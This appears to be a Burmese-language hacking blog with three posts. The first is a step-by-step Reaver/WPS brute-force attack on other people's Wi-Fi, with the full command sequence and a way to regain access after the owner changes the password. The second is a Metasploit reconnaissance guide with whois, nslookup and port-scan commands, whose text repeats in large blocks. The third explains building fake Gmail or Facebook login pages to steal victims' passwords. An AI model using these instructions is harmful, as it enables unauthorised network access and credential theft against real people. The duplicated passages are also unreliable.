0

Wifi Hacking (Wpa/Wpa2)

Tuesday, 7 January 2014
ဒီ Tutorial ကေတာ.ဘာမွာသိပ္လုပ္စရာမရွီပါဘူး Command နည္းနည္းပါးပါးရိုက္ရုန္ပါဘဲဒီေကာင္ကေတာ. Penetrate လုပ္တာအခ်ိန္ၾကာတယ္ဗ် 4-12 Hour ေလာက္ေတာ.ေပးရမယ္ဒါေပမယ္. Crack ႏိုင္ဖို.က 95% Chance ေလာက္ရွီပါတယ္။ကၽြန္ေတာ္ကိုယ္တိုင္လည္း Crack ဖူးပါတယ္ ၈နာရီခြဲေလာက္ၾကာပါတယ္။
BruteForce တိုက္တဲသေဘာေပါ.ဗ်ာ။

Ok Guys Let Start ..................

Well Will Use Just 1 Terminal For This

ပထမဆံုး Command ကေတာ. {airmon-ng}


Image has been scaled down 13% (900x675). Click this bar to view original image (1024x768). Click image to open in new window.




ဒုတိယ Command ကေတာ. {airmon-ng start wlan1}


Image has been scaled down 13% (900x675). Click this bar to view original image (1024x768). Click image to open in new window.




ဒါကေတာ. တတိယ Command ပါ Mac Spoofing အတြက္ပါမလုပ္လည္းရပါတယ္။
{ifconfig [interface] down
macchanger -m 00:11:22:33:44:55 [interface]
ifconfig [mon0] down
macchanger -m 00:11:22:33:44:55 [mon0]
ifconfig [interface] up
ifconfig [mon0] up}


Image has been scaled down 13% (900x675). Click this bar to view original image (1024x768). Click image to open in new window.




အခုကၽြန္ေတာ္တို. Penetrate လုပ္ခ်သ္တဲ. WiFi ကေပါက္လားမေပါက္ဘူးလားၾကည္.ရေအာင္။
Command{wash -i [mon0]}
“Vulnerable: WPS Locked: No”


Image has been scaled down 13% (900x675). Click this bar to view original image (1024x768). Click image to open in new window.




NO ျဖစ္တယ္ဆိုရင္ေတာ.ဆက္လုပ္လို.ရပါတယ္ Yes ျဖစ္ေနတယ္ဆိုရင္ေတာ.မရဘူးေပါ.။ :(

No ျဖစ္တယ္ဆိုရင္ေတာ.ဒီ Command ကိုဆက္ရိုက္ျပီးဆက္သြားပါမယ္။
{reaver -i [mon0] -c [Channel number] -b [BSSID] -S -L -vv}

ဒီလိုစျပီး BruteForce စတိုက္ပါေတာ.မယ္။


Image has been scaled down 13% (900x675). Click this bar to view original image (1024x768). Click image to open in new window.




Warning Receive Time Out error တက္ရင္ဘာမွမျဖစ္ပါဘူးဆက္သြားေနမွာပါ error တက္တယ္ဆိုျပီမရပ္လိုက္ပါႏွဲ. :P


Image has been scaled down 13% (900x675). Click this bar to view original image (1024x768). Click image to open in new window.





Image has been scaled down 13% (900x675). Click this bar to view original image (1024x768). Click image to open in new window.




အခုထိုင္ျပီးေစာင္.ေတာ.ဗ်ို.ကၽြန္ေတာ္တုန္းကေတာ.ညမွစတိုက္ျပီးအိပ္လိုက္တာမနက္ထတဲ.ထိ​မျပီးေသးဘူး Breafast စားျပီးမွာျပီးတယ္ :P

Password Cracked ျဖစ္သြားရင္ပံုထဲကအတိုင္းျမင္ရမွာပါ။


Image has been scaled down 13% (900x675). Click this bar to view original image (1024x768). Click image to open in new window.




WPS PIn ဆိုတာက Router ရဲ. Pin ပါအကယ္၍ Router Owner က ခိုးသံုးတာသိသြားလို. Password Change လိုက္ရင္အစကလို Brute Force ထိုင္တိုက္စရာမလိုေတာ.ပါဘူး Pin ထည္.ျပီးၾကည္.လိုက္ရင္ Password ထြက္လာပါလိန္.မယ္။ဒါေၾကာင္. Crack ျပီးသြားရင္ PIn ကိုမွတ္ထားဖို.ေတာ.လိုပါတယ္။

WPA PSK ဆိုတာကေတာ. Wifi ရဲ Password ပါ :P

အကယ္၍ Owner က Password ေျပာင္းလိုက္တယ္ဆိုရင္ဒီလိုျပန္ျပီးေတာ. Password ျပန္ယူလို.ရပါတယ္၂ Min ေလာက္ဘဲၾကာမယ္ထင္ပါတယ္။ :P

{reaver -i [mon0] -c [Channel number] -b [BSSID] -p [PIN key] -vv}

For Advanced User
[Some AP locks WPS when you try wrong key to many times. Only hard-reset helps.
Ignore any errors if it keeps going.
You can login into Wifi with PIN only. So you needn’t to crack WPA key.]

Ohhhh I Forget To Tell This Method Is Called WPS Attack With Popular Tool Called Reaver
1

[talk]Metasploit Guide-2

Sunday, 5 January 2014
INFORMATION GATHERING
အုိးေခ ဒီအပုိင္းမွာေတာ့ ဘယ္လုိမ်ိုး info gathering လုပ္နုိင္သလဲ ၊ ဘယ္လုိလုပ္လုိ့ရသလဲဆုိတာေလးေတြ ေျပာသြားမွာျဖစ္ပါတယ္။ ဒီအပုိင္းကေတာ့ က်ေနာ္ ပထမပုိင္းတုန္းက ေျပာခဲ့တဲ့ pre-engagement ျပီးေတာ့ ဒုတိယေဆာင္ရြက္ရတဲ့ အပုိင္းပဲျဖစ္ပါတယ္။ ေျပာခဲ့သလုိပါပဲ အခ်က္အလက္ေတြ ရနုိင္သေလာက္စုေဆာင္းတာဟာ အေရးပါတဲ့အရည္အခ်င္းတစ္ရပ္ ပဲျဖစ္ပါတယ္။ တကယ္လုိ့မ်ား က်ေနာ္တုိ့ေတြ အခ်က္လက္ေတြ ေသခ်ာမစုေဆာင္းခဲ့ဘူးဆုိရင္ေတာ့ က်ေနာ္တုိ့တေတြ vul ေလးေတြ အေပါက္ေလးေတြနဲ့ လြဲသြားနုိင္ပါတယ္။ ဟီးဟီး.. အေပါက္ေတာ့ အလြဲခံလုိ့ ျဖစ္ဘူးရယ္ .. :P .... ။ဒီလုိမ်ိုး စုေဆာင္းဖုိ့အတြက္ကေတာ့ က်ေနာ္တုိ့ တေတြ စိတ္ရွည္ရွည္နဲ့ အခ်ိန္ေပးရမွာပဲျဖစ္ပါတယ္။ web pages ေတြ ကေနရွာမယ္၊ Google ကေနရွာမယ္၊ ျပီးရင္ အဲ့ဒီ system ရဲ့ တည္ေဆာက္ပုံ အလုပ္လုပ္ပုံကုိ ေသခ်ာနားလည္ရမွာျဖစ္ပါတယ္။ ဒါေတြေျပာေနလုိ့ စိတ္ဓါတ္မက်နဲ့အုံးေနာ္.. ေနာက္ပုိင္းက်ရင္ဒါေတြရဲ့ အေရးပါတာကုိ သိလာမွာပါ။ .. အဲ အေရးျကီးတာတစ္ခုက က်ေနာ္တုိ့ ရရွိလာတဲ့ အခ်က္လက္ေတြကုိ မွတ္တမ္းလုပ္ထားရမွာျဖစ္ျပီး က်ေနာ္တုိ့ ကုိယ္တုိင္ အဲ့ဒီ မွတ္တမ္းမွတ္ရာေတြကုိ သတိရေနရမွာပဲျဖစ္ပါတယ္။အုိးေခ... ဘာပဲလုပ္လုပ္ အထူးသတိထားဖုိ့ေတာ့မွာခ်င္ပါတယ္ဗ်ာ... ( ဟီးဟီး ေက်ာ္ဟိန္းေလသံျဖင့္ .... :P )

1 > Passive Information Gathering
Passive ကုိအသုံးျပုတာကေတာ့ target ရဲ့ system ကုိ လုံး၀ ကုိယ္တုိင္ထိေတြ့တာမ်ိုးမလုပ္ေသးပဲနဲ့ ရနုိင္သမ်ွ သြယ္၀ုိက္တဲ့ နည္းနဲ့ အခ်က္လက္ေတြရယူတာပဲျဖစ္ပါတယ္။ဒီနည္းလမ္းကုိ ဘယ္လုိသုံးလဲ ဆုိရင္ ဥပမာ က်ေနာ္တုိ့ေတြ target network ရဲ့ network boundaries ကုိသတ္မွတ္တဲ့အခ်ိန္၊ network maintainers ေတြသတ္မွတ္တဲ့အခ်ိန္ ေတြနဲ့ OS system / web sever software ေတြ ကုိ ရွာေဖြခ်ိန္မွာ သုံးပါတယ္။
Open source intelligence (OSINT) ဆုိတာကေတာ့ လြတ္လပ္စြာအသုံးျပုနုိင္ျပီ target အတြက္ ခြင့္ျပုေပးထားတဲ့ အခ်က္လက္ေတြကုိ ရွာေဖြဖုိ့အတြက္ ပုံစံ ထုတ္ထားတာျဖစ္ပါတယ္။ ဘာထိခုိက္မွုမွ မရွိပဲ အသုံးျပုနုိင္တဲ့ Yeti တုိ့လုိ whois တုိ့လုိ မ်ိုး passive info-gathering tools ေတြမ်ားစြာရွိပါတယ္။
အုိေခ... ဆုိပါစုိ့ဗ်ာ.. က်ေနာ္တုိ့ ေတြ http://www.secmaniac.net/ ကုိ ေဆာ္မယ္ ဆုိပါေတာ့ က်ေနာ္တုိ့ရဲ့ ပထမဆုံး Goal ကေတာ့ အဲ့ဒီဆုိက္ဟာ ဘယ္ကပုိင္တယ္၊ ဘယ္ system ကို က်ေနာ္တုိ့ တုိက္နုိင္တယ္၊ ဘယ္အပုိင္းကေတာ့ ေဖာက္လုိ့ရတယ္ စတာေတြကုိ ေသခ်ာသိရွိသတ္မွတ္နုိင္ဖုိ့ျဖစ္ပါတယ္။

2 > whois Lookups
အုိးးးေခ.. .က်ေနာ္တုိ့ msf ေခါ္လုိက္ပါမယ္ျပီးရင္ ...ဒန္တန့္ဒန္.. ... ဟီး .. ဘာမွလုပ္ဘူး လုိ့. .. ျပီးရင္ whois နဲ့အေနာက္ကေန က်ေတာ္တုိ့ ရွာခ်င္တဲ့ target ထည့္လုိက္ပါမယ္။


Code:

msf > whois secmaniac.net
[*] exec: whois secmaniac.net

. . . SNIP . . .

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: SECMANIAC.NET
Created on: 03-Feb-10
Expires on: 03-Feb-12
Last Updated on: 03-Feb-10
XDomain servers in listed order:
NS57.DOMAINCONTROL.COM
NS58.DOMAINCONTROL.COM
ေဟေဟ့..စေတြ့ပါျပီ.. က်ေနာ္တုိ့ေတြ ဒီ DNS servers ကုိ DOMAINCONTROL.COM ကေန ေပးထားတာကုိေတြ့ရပါျပီ။ဟီးဟီး... အဲ့လုိေလးေတြေပါ့ေနာ္... ဥပမာေလးေပါ့ေနာ္..

3 > Netcraft
Netcraft ( http ://searchdns.netcraft. com/) ကေတာ့ web-based tool တစ္ခုျဖစ္ျပီး သူ့ကုိ Hosting လုပ္ထားတဲ့ server ရဲ့ IP address ရွာေဖြရာမွာ INFORMATION GATHERING
အုိးေခ ဒီအပုိင္းမွာေတာ့ ဘယ္လုိမ်ိုး info gathering လုပ္နုိင္သလဲ ၊ ဘယ္လုိလုပ္လုိ့ရသလဲဆုိတာေလးေတြ ေျပာသြားမွာျဖစ္ပါတယ္။ ဒီအပုိင္းကေတာ့ က်ေနာ္ ပထမပုိင္းတုန္းက ေျပာခဲ့တဲ့ pre-engagement ျပီးေတာ့ ဒုတိယေဆာင္ရြက္ရတဲ့ အပုိင္းပဲျဖစ္ပါတယ္။ ေျပာခဲ့သလုိပါပဲ အခ်က္အလက္ေတြ ရနုိင္သေလာက္စုေဆာင္းတာဟာ အေရးပါတဲ့အရည္အခ်င္းတစ္ရပ္ ပဲျဖစ္ပါတယ္။ တကယ္လုိ့မ်ား က်ေနာ္တုိ့ေတြ အခ်က္လက္ေတြ ေသခ်ာမစုေဆာင္းခဲ့ဘူးဆုိရင္ေတာ့ က်ေနာ္တုိ့တေတြ vul ေလးေတြ အေပါက္ေလးေတြနဲ့ လြဲသြားနုိင္ပါတယ္။ ဟီးဟီး.. အေပါက္ေတာ့ အလြဲခံလုိ့ ျဖစ္ဘူးရယ္ .. :P .... ။ဒီလုိမ်ိုး စုေဆာင္းဖုိ့အတြက္ကေတာ့ က်ေနာ္တုိ့ တေတြ စိတ္ရွည္ရွည္နဲ့ အခ်ိန္ေပးရမွာပဲျဖစ္ပါတယ္။ web pages ေတြ ကေနရွာမယ္၊ Google ကေနရွာမယ္၊ ျပီးရင္ အဲ့ဒီ system ရဲ့ တည္ေဆာက္ပုံ အလုပ္လုပ္ပုံကုိ ေသခ်ာနားလည္ရမွာျဖစ္ပါတယ္။ ဒါေတြေျပာေနလုိ့ စိတ္ဓါတ္မက်နဲ့အုံးေနာ္.. ေနာက္ပုိင္းက်ရင္ဒါေတြရဲ့ အေရးပါတာကုိ သိလာမွာပါ။ .. အဲ အေရးျကီးတာတစ္ခုက က်ေနာ္တုိ့ ရရွိလာတဲ့ အခ်က္လက္ေတြကုိ မွတ္တမ္းလုပ္ထားရမွာျဖစ္ျပီး က်ေနာ္တုိ့ ကုိယ္တုိင္ အဲ့ဒီ မွတ္တမ္းမွတ္ရာေတြကုိ သတိရေနရမွာပဲျဖစ္ပါတယ္။အုိးေခ... ဘာပဲလုပ္လုပ္ အထူးသတိထားဖုိ့ေတာ့မွာခ်င္ပါတယ္ဗ်ာ... ( ဟီးဟီး ေက်ာ္ဟိန္းေလသံျဖင့္ .... :P )

1 > Passive Information Gathering
Passive ကုိအသုံးျပုတာကေတာ့ target ရဲ့ system ကုိ လုံး၀ ကုိယ္တုိင္ထိေတြ့တာမ်ိုးမလုပ္ေသးပဲနဲ့ ရနုိင္သမ်ွ သြယ္၀ုိက္တဲ့ နည္းနဲ့ အခ်က္လက္ေတြရယူတာပဲျဖစ္ပါတယ္။ဒီနည္းလမ္းကုိ ဘယ္လုိသုံးလဲ ဆုိရင္ ဥပမာ က်ေနာ္တုိ့ေတြ target network ရဲ့ network boundaries ကုိသတ္မွတ္တဲ့အခ်ိန္၊ network maintainers ေတြသတ္မွတ္တဲ့အခ်ိန္ ေတြနဲ့ OS system / web sever software ေတြ ကုိ ရွာေဖြခ်ိန္မွာ သုံးပါတယ္။
Open source intelligence (OSINT) ဆုိတာကေတာ့ လြတ္လပ္စြာအသုံးျပုနုိင္ျပီ target အတြက္ ခြင့္ျပုေပးထားတဲ့ အခ်က္လက္ေတြကုိ ရွာေဖြဖုိ့အတြက္ ပုံစံ ထုတ္ထားတာျဖစ္ပါတယ္။ ဘာထိခုိက္မွုမွ မရွိပဲ အသုံးျပုနုိင္တဲ့ Yeti တုိ့လုိ whois တုိ့လုိ မ်ိုး passive info-gathering tools ေတြမ်ားစြာရွိပါတယ္။
အုိေခ... ဆုိပါစုိ့ဗ်ာ.. က်ေနာ္တုိ့ ေတြ http://www.secmaniac.net/ ကုိ ေဆာ္မယ္ ဆုိပါေတာ့ က်ေနာ္တုိ့ရဲ့ ပထမဆုံး Goal ကေတာ့ အဲ့ဒီဆုိက္ဟာ ဘယ္ကပုိင္တယ္၊ ဘယ္ system ကို က်ေနာ္တုိ့ တုိက္နုိင္တယ္၊ ဘယ္အပုိင္းကေတာ့ ေဖာက္လုိ့ရတယ္ စတာေတြကုိ ေသခ်ာသိရွိသတ္မွတ္နုိင္ဖုိ့ျဖစ္ပါတယ္။

2 > whois Lookups
အုိးးးေခ.. .က်ေနာ္တုိ့ msf ေခါ္လုိက္ပါမယ္ျပီးရင္ ...ဒန္တန့္ဒန္.. ... ဟီး .. ဘာမွလုပ္ဘူး လုိ့. .. ျပီးရင္ whois နဲ့အေနာက္ကေန က်ေတာ္တုိ့ ရွာခ်င္တဲ့ target ထည့္လုိက္ပါမယ္။


Code:

msf > whois secmaniac.net
[*] exec: whois secmaniac.net

. . . SNIP . . .

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: SECMANIAC.NET
Created on: 03-Feb-10
Expires on: 03-Feb-12
Last Updated on: 03-Feb-10
XDomain servers in listed order:
NS57.DOMAINCONTROL.COM
NS58.DOMAINCONTROL.COM
ေဟေဟ့..စေတြ့ပါျပီ.. က်ေနာ္တုိ့ေတြ ဒီ DNS servers ကုိ DOMAINCONTROL.COM ကေန ေပးထားတာကုိေတြ့ရပါျပီ။ဟီးဟီး... အဲ့လုိေလးေတြေပါ့ေနာ္... ဥပမာေလးေပါ့ေနာ္..

3 > Netcraft
Netcraft ( http ://searchdns.netcraft. com/) ကေတာ့ web-based tool တစ္ခုျဖစ္ျပီး သူ့ကုိ Hosting လုပ္ထားတဲ့ server ရဲ့ IP address ရွာေဖြရာမွာ အသုံးျပုနုိင္ပါတယ္။



အုိေခ..က်ေနာ္တုိ့ ပုံမွာေတြ့ရတဲ့အတုိင္းပဲ secmaniac.net ရဲ့ IP address ကေတာ့ 75.118.185.142 ျဖစ္ပါတယ္။ဟုတ္ျပီ ဒါဆုိရင္ က်ေနာ္တုိ့ whois နဲ့ အတူ ဒီ IP ကုိထည့္ျကည့္ရေအာင္...


Code:

msf > whois 75.118.185.142
[*] exec: whois 75.118.185.142
WideOpenWest Finance LLC WIDEOPENWEST (NET-75-118-0-0-1)
75.118.0.0 - 75.118.255.255
WIDEOPENWEST OHIO WOW-CL11-1-184-118-75 (NET-75-118-184-0-1)
75.118.184.0 - 75.118.191.255
ဟီးဟီး.. ေတြ့ပါျပီ ..( WIDEOPENWEST ) ဆုိတဲ့ ဒီ IP ကုိ service ေပးထားတဲ့ provider..။ ...

4 > NSLookup
nslookup ကုိေတာ့ က်ေနာ္တု့ိေတြ server ရဲ့ info ေတြကုိ ရယူတဲ့အခ်ိန္မွာအသုံးျပုပါတယ္။..အုိေခ.. စမ္းျကည့္ရေအာင္


Code:

root@bt:~# nslookup
set type=mx
> secmaniac.net
Server: 172.16.32.2
Address: 172.16.32.2#53
Non-authoritative answer:
secmaniac.net mail exchanger = 10 mailstore1.secureserver.net.
secmaniac.net mail exchanger = 0 smtp.secureserver.net. ဟီး...ဟီးး... ေတြ့ရတဲ့ အတုိင္းပဲ သူ့ရဲ့ mail server နွစ္ခုက mailstore1.secureserver.net နဲ့ smtp.secureserver.net ဆုိတာကုိျပေနပါတယ္။ဒီေလာက္ဆုိ Passive နည္းကုိသေဘာေပါက္ျပီထင္ပါတယ္။ ဒါဆုိ Active နည္းကုိ ဆက္မယ္ေနာ္ မာမီတုိ့....

5 > Active Information Gathering
Active အပုိင္းမွာေတာ့ က်ေနာ္တုိ့ေတြဟာ System ကုိ တုိက္ရိုက္ထိေတြ့မွုေလးေတြလုပ္ျပီး ေတာ့ ပုိျပီးသိေအာင္ေဆာင္ရြက္တာပဲျဖစ္ပါတယ္။ ဥပမာဆုိရရင္ target ကုိ Port Scan လုပ္တာတုိ့ conduct scan လုပ္ျပီး ဘယ္ services ေတြ running ျဖစ္ေနသလဲတုိ့ေပါ့ဗ်ာ။ဒီ system ဒါမွမဟုတ္ running ျဖစ္ေနတဲ့ services ေတြကုိ ရွာေဖြေတြ့ရွိတာဟာ က်ေနာ္တုိ့ exploit ေကာင္းေကာင္းလုပ္နုိင္ဖုိ့ အတြက္ အခြင့္အေရးတစ္ခုကုိ ထပ္ရွာေတြ့ လုိက္တာနဲ့ တူတူပါပဲ။

6 > Port Scanning with Nmap
Nmap ကုိ သုံးျပီး target ကုိ scan လုပ္လုိ့ရတာေတြ အမ်ားျကီးပါပဲ။ Nmap အတြက္ကုိေတာ့ က်ေနာ္ Nmap သုံးနည္းေရးထားတဲ့ ပုိစ့္မွာအေသးစိတ္သြားေရာက္ျကည့္နုိင္ပါတယ္။

7 > Port Scanning with Metasploit
Metasploit မွာ third-party scanners ေတြကုိ အသုံးျပုနုိင္တဲ့ အရည္အခ်င္းတစ္ခုရွိပါတယ္။က်ေနာ္တုိ့ေတြ pivoting လုိ့ မျကာခဏ ေျပာေျပာေနျက ရထားျပီးသား System နဲ့ ခ်ိတ္ဆက္ထားတဲ့ အျခား system ေတြရဲ့ ၀င္ထြက္ေနတဲ့ traffic ေတြ network ေတြ ကို ေကာင္းေကာင္းျကီး ကုိင္တြယ္နုိင္စြမ္းရွိပါတယ္။ဥပမာ ဆုိရရင္ က်ေနာ္တုိ့ ရထားတဲ့ system ဟာ Firewall တစ္ခုရဲ့ ေနာက္ကြယ္မွာရွိေနတာျဖစ္ျပီး အဲ့ဒိ firewall ဟာ Network Address Translation (NAT) ကုိအသုံးျပုျပီး အလုပ္လုပ္ပါတယ္။ဒီလုိ NAT-based firewall ရဲ့ ေနာက္က system ေတြဟာ private IP address ကုိအသုံးျပုျကပါတယ္။အဲ့ဒီ IP address ကေတာ့ internet နဲ့ တုိက္ရိုက္ခ်ိတ္ဆက္လုိ့မရနုိင္ပါဘူး။ဒီလုိဆုိေတာ့ က်ေနာ္တုိ့ ရဲ့ Metasploit ျကီးဟာ NAT ေနာက္က system တစ္ခုကုိသာအပုိင္ခ်ိတ္မိျပီ ဆုိရင္ အဲ့ဒီ traffic ကေနျပီး internal system ေတြကုိ ေကာင္းေကာင္းကုိင္တြယ္နုိင္မွာပဲျဖစ္ပါတယ္။ အုိေခ.. ခုလုိမ်ိုး firewall ေနာက္က private IP-based systems ေတြကုိ traffic ေက်ာ္ခြျပီး တုိက္ခိုက္တာကုိ က်ေနာ္တုိ့ေတြ Pivot လုပ္တယ္လုိ့ေခါ္ပါတယ္။
Msf မွာ port scanning tools စာရင္းကုိျကည့္ဖုိ့အတြက္ဆုိရင္ .. search ကြန္မန္းနဲ့ portscan ဆုိျပီး တြဲဖက္ျပီးအသုံးျပုနုိင္ပါတယ္။


Code:

msf > search portscan
ဒါဆုိရင္ က်ေနာ္တုိ့ အသုံးျပုနုိင္တဲ့ port scanning tools ေတြတျပုတ္ျကီးေတြ့ရမွာျဖစ္ပါတယ္။အဲ့ထဲကတစ္ခုကုိသုံးပါမယ္...



Code:

msf > use scanner/portscan/syn
msf auxiliary(syn) > set RHOSTS 192.168.1.155
RHOSTS => 192.168.1.155
msf auxiliary(syn) > set THREADS 50
THREADS => 50
msf auxiliary(syn) > run
[*] TCP OPEN 192.168.1.155:135
[*] TCP OPEN 192.168.1.155:139
[*] TCP OPEN 192.168.1.155:445
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) >
အုိေခ... ခုဆုိရင္ က်ေနာ္တုိ့ IP address 192.168.1.155 မွာရွိတဲ့ ports 135, 139 နဲ့ 445 တုိ့ ပြင့္ေနတာကုိ ေတြ့ရမွာျဖစ္ပါတယ္။အသုံးျပုနုိင္ပါတယ္။



အုိေခ..က်ေနာ္တုိ့ ပုံမွာေတြ့ရတဲ့အတုိင္းပဲ secmaniac.net ရဲ့ IP address ကေတာ့ 75.118.185.142 ျဖစ္ပါတယ္။ဟုတ္ျပီ ဒါဆုိရင္ က်ေနာ္တုိ့ whois နဲ့ အတူ ဒီ IP ကုိထည့္ျကည့္ရေအာင္...


Code:

msf > whois 75.118.185.142
[*] exec: whois 75.118.185.142
WideOpenWest Finance LLC WIDEOPENWEST (NET-75-118-0-0-1)
75.118.0.0 - 75.118.255.255
WIDEOPENWEST OHIO WOW-CL11-1-184-118-75 (NET-75-118-184-0-1)
75.118.184.0 - 75.118.191.255
ဟီးဟီး.. ေတြ့ပါျပီ ..( WIDEOPENWEST ) ဆုိတဲ့ ဒီ IP ကုိ service ေပးထားတဲ့ provider..။ ...

4 > NSLookup
nslookup ကုိေတာ့ က်ေနာ္တု့ိေတြ server ရဲ့ info ေတြကုိ ရယူတဲ့အခ်ိန္မွာအသုံးျပုပါတယ္။..အုိေခ.. စမ္းျကည့္ရေအာင္


Code:

root@bt:~# nslookup
set type=mx
> secmaniac.net
Server: 172.16.32.2
Address: 172.16.32.2#53
Non-authoritative answer:
secmaniac.net mail exchanger = 10 mailstore1.secureserver.net.
secmaniac.net mail exchanger = 0 smtp.secureserver.net. ဟီး...ဟီးး... ေတြ့ရတဲ့ အတုိင္းပဲ သူ့ရဲ့ mail server နွစ္ခုက mailstore1.secureserver.net နဲ့ smtp.secureserver.net ဆုိတာကုိျပေနပါတယ္။ဒီေလာက္ဆုိ Passive နည္းကုိသေဘာေပါက္ျပီထင္ပါတယ္။ ဒါဆုိ Active နည္းကုိ ဆက္မယ္ေနာ္ မာမီတုိ့....

5 > Active Information Gathering
Active အပုိင္းမွာေတာ့ က်ေနာ္တုိ့ေတြဟာ System ကုိ တုိက္ရိုက္ထိေတြ့မွုေလးေတြလုပ္ျပီး ေတာ့ ပုိျပီးသိေအာင္ေဆာင္ရြက္တာပဲျဖစ္ပါတယ္။ ဥပမာဆုိရရင္ target ကုိ Port Scan လုပ္တာတုိ့ conduct scan လုပ္ျပီး ဘယ္ services ေတြ running ျဖစ္ေနသလဲတုိ့ေပါ့ဗ်ာ။ဒီ system ဒါမွမဟုတ္ running ျဖစ္ေနတဲ့ services ေတြကုိ ရွာေဖြေတြ့ရွိတာဟာ က်ေနာ္တုိ့ exploit ေကာင္းေကာင္းလုပ္နုိင္ဖုိ့ အတြက္ အခြင့္အေရးတစ္ခုကုိ ထပ္ရွာေတြ့ လုိက္တာနဲ့ တူတူပါပဲ။

6 > Port Scanning with Nmap
Nmap ကုိ သုံးျပီး target ကုိ scan လုပ္လုိ့ရတာေတြ အမ်ားျကီးပါပဲ။ Nmap အတြက္ကုိေတာ့ က်ေနာ္ Nmap သုံးနည္းေရးထားတဲ့ ပုိစ့္မွာအေသးစိတ္သြားေရာက္ျကည့္နုိင္ပါတယ္။

7 > Port Scanning with Metasploit
Metasploit မွာ third-party scanners ေတြကုိ အသုံးျပုနုိင္တဲ့ အရည္အခ်င္းတစ္ခုရွိပါတယ္။က်ေနာ္တုိ့ေတြ pivoting လုိ့ မျကာခဏ ေျပာေျပာေနျက ရထားျပီးသား System နဲ့ ခ်ိတ္ဆက္ထားတဲ့ အျခား system ေတြရဲ့ ၀င္ထြက္ေနတဲ့ traffic ေတြ network ေတြ ကို ေကာင္းေကာင္းျကီး ကုိင္တြယ္နုိင္စြမ္းရွိပါတယ္။ဥပမာ ဆုိရရင္ က်ေနာ္တုိ့ ရထားတဲ့ system ဟာ Firewall တစ္ခုရဲ့ ေနာက္ကြယ္မွာရွိေနတာျဖစ္ျပီး အဲ့ဒိ firewall ဟာ Network Address Translation (NAT) ကုိအသုံးျပုျပီး အလုပ္လုပ္ပါတယ္။ဒီလုိ NAT-based firewall ရဲ့ ေနာက္က system ေတြဟာ private IP address ကုိအသုံးျပုျကပါတယ္။အဲ့ဒီ IP address ကေတာ့ internet နဲ့ တုိက္ရိုက္ခ်ိတ္ဆက္လုိ့မရနုိင္ပါဘူး။ဒီလုိဆုိေတာ့ က်ေနာ္တုိ့ ရဲ့ Metasploit ျကီးဟာ NAT ေနာက္က system တစ္ခုကုိသာအပုိင္ခ်ိတ္မိျပီ ဆုိရင္ အဲ့ဒီ traffic ကေနျပီး internal system ေတြကုိ ေကာင္းေကာင္းကုိင္တြယ္နုိင္မွာပဲျဖစ္ပါတယ္။ အုိေခ.. ခုလုိမ်ိုး firewall ေနာက္က private IP-based systems ေတြကုိ traffic ေက်ာ္ခြျပီး တုိက္ခိုက္တာကုိ က်ေနာ္တုိ့ေတြ Pivot လုပ္တယ္လုိ့ေခါ္ပါတယ္။
Msf မွာ port scanning tools စာရင္းကုိျကည့္ဖုိ့အတြက္ဆုိရင္ .. search ကြန္မန္းနဲ့ portscan ဆုိျပီး တြဲဖက္ျပီးအသုံးျပုနုိင္ပါတယ္။


Code:

msf > search portscan
ဒါဆုိရင္ က်ေနာ္တုိ့ အသုံးျပုနုိင္တဲ့ port scanning tools ေတြတျပုတ္ျကီးေတြ့ရမွာျဖစ္ပါတယ္။အဲ့ထဲကတစ္ခုကုိသုံးပါမယ္...



Code:

msf > use scanner/portscan/syn
msf auxiliary(syn) > set RHOSTS 192.168.1.155
RHOSTS => 192.168.1.155
msf auxiliary(syn) > set THREADS 50
THREADS => 50
msf auxiliary(syn) > run
[*] TCP OPEN 192.168.1.155:135
[*] TCP OPEN 192.168.1.155:139
[*] TCP OPEN 192.168.1.155:445
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) >
အုိေခ... ခုဆုိရင္ က်ေနာ္တုိ့ IP address 192.168.1.155 မွာရွိတဲ့ ports 135, 139 နဲ့ 445 တုိ့ ပြင့္ေနတာကုိ ေတြ့ရမွာျဖစ္ပါတယ္။
0

ငါးျမားျခင္းအေၾကာင္းနဲ႔ျပဳလုပ္နည္း

Friday, 3 January 2014
Phishing ဆုိတာဘာလဲ...
Phishing ဆုိတာကေတာ့ gamil(or) facebook အစရွိတဲ့ web page အတုမ်ားျပဳလုပ္ၿပီး.. ကုိယ့္ victim ထံေပးပုိ႕ကာ.. ကုိယ့္victim ထံမွ password ရယူျခင္းျဖစ္ပါတယ္....
တစ္ခ်ိဳ႕ဟက္ကာေတြေျပာတာကေတာ့ ဟက္ကင္းေလ့လာခ်င္ရင္ Phishing ကေနစေလ့လာ လုိ႔လည္းေျပာၾကပါတယ္... ကၽြန္ေတာ္အရင္ကလည္း MHU မွာ Phishing နဲ႔ပတ္သက္တဲ့ က်ဴတုိ တင္ေပးဖူးပါတယ္... အခုေတာ့ MSF Forum မွာ ထပ္မံတင္ေပးလုိက္ပါမယ္....

ပံုမွန္အားျဖင့္ Login form ေတြရဲ႕ html code က ေအာက္ပါအတုိင္းျဖစ္ပါတယ္...

<form action="login.php" method="GET/post">
Username <input type="text" value="username"/> </br>
Password <input type="submit" value="password"/>
</form>

ဆုိၿပီး User login ၀င္ဖုိ႔ User name နဲ႔ password ဆုိၿပီး ေယဘုယ်အားျဖင့္ ႏွစ္ခုရွိပါတယ္..
<form> tag က action= ကေတာ့ user ၀င္လုိက္တဲ့ user name နဲ႔ password မွန္မမွန္ database ထဲမွာသိမ္းထားတဲ့ အခ်က္အလက္ေတြနဲ႔တုိက္စစ္ေပးတဲ့ php code ကုိ link ညႊန္းထားပါ... method ကေတာ့ Phising page လုပ္မယ္ဆုိရင္ post method ပဲသံုးရပါမယ္..
Phishing page မွာလည္းအထက္ပါထုိနည္းေတြကုိအသံုးျပဳထားပါတယ္..
ကုိယ္ဖန္တီးလုိက္တဲ့စာမ်က္ႏွာအတုေတြနဲ႔ ကုိယ့္ victim ထံပုိ႔လုိက္ရင္.. ကုိယ့္ victim က တကယ့္ Gmail,Facebook ထင္ၿပီး ၀င္လုိက္တဲ့အခါ.. action မွာ link ညႊန္းထားတဲ့.. php code က user name & password ကုိ output file တစ္ဖုိင္ထဲမွာ သြားသိမ္းေပးပါ့မယ္..
